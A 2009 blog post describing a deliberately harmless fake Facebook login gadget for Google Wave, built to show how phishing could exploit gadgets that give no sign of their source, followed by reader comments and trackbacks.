Oct. 20, 2009

Posted by in Google | 2 comments

Have You Seen the New Facebook Gadget for Google Wave?


The above screenshot shows an actual gadget inside a Wave that I created to demonstrate it. Imagine the possibilities of connecting Facebook with Google Wave. You could post information to your Facebook profile right from within Wave, or connect wave participants to Facebook profiles. If you came across this gadget in a wave you were viewing, wouldn’t you love to at least try it out?

There’s just one problem. The above gadget is fake. Not the screenshot, mind you – if you’re a Google Wave user, you can see the gadget in action by inserting the gadget https://theharmonyguy.com/facebook.xml into a wave. But nothing will happen when you try to connect.

And in this case, truly nothing will happen, since I’ve designed the gadget to be harmless – your login information is not sent anywhere. But I imagine many users would fall prey to such a trick, which could be easily adapted for phishing attacks. Ask yourself honestly, would you have tried to login? More importantly, if you came across such a gadget in a wave, how would you know whether it came from theharmonyguy.com, facebook.com, or a malicious host?

I post all this to raise a broader point than simply “beware of phishing attacks.” I realize that the balance between security and usability is a constant struggle for developers, or at least should be. Yet I’m somewhat concerned by the patterns we are training users to be accustomed to.

Case in point: chromeless gadgets within a wave that provide no indication of source. In some ways I almost feel that Google Wave is recreating the web browser. Browsers are applications that can load any sort of web page. Google Wave is an application that can load all sorts of web pages within waves. Yet many of the features developed for browsers to warn a user of insecure sites or phishing attacks (even as basic as the address bar, which shows the current domain) are not replicated when a user loads a gadget in Wave. Many have described Wave as a reinvention of e-mail. Reinventing a technology can be very beneficial, but let’s not forget lessons learned in the old technology – there’s a reason most e-mail clients don’t allow iframes and JavaScript, for instance.

I’m certainly not the first to raise these concerns; others have previously mentioned the danger of login forms on iGoogle gadgets. Nor am I saying that I don’t want Google Wave to succeed. But if we’re going to reinvent a technology, let’s address some of these basic issues of user expectations and security precautions from the start.

  1. Oh yeah, I could definitely do with a Google wave connected to all social networks (FB, Twitter, LinkedIn, blogs…)

  2. Interested with this idea... says:

    I would rather to see Facebook create the gadget themselves and enable into Wave. That will ensure that gadget is safe to use. Why not? Likewise for all social network.


  1. Tweets that mention Have You Seen the New Facebook Gadget for Google Wave? | Social Hacking -- Topsy.com - [...] This post was mentioned on Twitter by theharmonyguy, Bart Hermans. Bart Hermans said: RT @theharmonyguy New Post: Have You ...
  2. Google Wave, so far it’s the answer to a question no one asked. | Things and Stuff - [...] am intrigued by the seemingly total lack of security though.  So is this guy, and he has great points. ...
  3. New Facebook Profile Picture | More More Pics - [...] to your Facebook profile theharmonyguy.com [...]

Leave a Reply